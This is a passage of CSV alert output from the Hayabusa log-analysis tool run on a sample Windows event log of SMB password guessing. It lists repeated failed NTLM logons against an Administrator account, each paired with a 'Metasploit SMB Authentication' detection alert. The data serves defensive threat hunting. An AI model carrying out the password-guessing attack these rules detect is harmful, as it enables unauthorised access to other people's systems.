Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R7SUyYbLPfPAGUfw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7clwftf7R0uNbqJ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IsIyPcMAPnlxJa12 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4CKcyo1Ec4rs3Z2g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZlzKvZLO8CDotkbE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EyRpYYtmD8389Yvp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t3Pg0H9Gncoyr45m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zksaaJ7Z1wuy4PMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WdYAEdfWxLdM1rh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VyYFJRy0cxPfqDFh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hv2Lz1h1bG6UatVR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FLKPLfEe3PpEzRNc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJWv7ggzCSyEznOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZUtR9CNfKMHQMd7T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6fYNHuRTqi15cRkL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DvxZHwJwrBYXlEyv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jscJTJjhKvCtDl8q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZEIEjcimMyHWUsp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 30OdVRH9ZATLezsR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJ1OSBVZHKmyOzj8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JanG6Q0oYpTdm9mC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PWCwDYL3T7TAdb0J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mRdyZaio1HjUKlNQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VjiRnExy9TzZTG0R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ztUyQpl8c9RoAr1j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jC23QAFM07q7cfVo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TSM8lmdOFoDslQNa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sGZaUGAT1oXmnGLB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZMNo21pTA67pb7Go : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EiTZCqK3m4icL1Vi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZaZ2mnoihX1Ec4di : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ihm9zaXkmWklXk4u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yLIZ3tlw9VlQmK28 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GVHzJHTi55NbxXYY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1FROeEnMLna2fTTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pio6ZZ9pV0pS2Whi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h1aD2w5U5K9ND5HV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zF8Jb4GpG4D3xn9i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Edv4GwGfL156V1xe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Irvneva9RFn44iII : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dHtJFI8OL9kJylL5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F5Q4h62T77hGjhKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdSALwo9td9xUeBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1kYfoqz1r1NuEn04 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7X400gufqdunUa8j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lLR8z7g0GY8r7a1r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QHMztrxiKBGtNqkp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 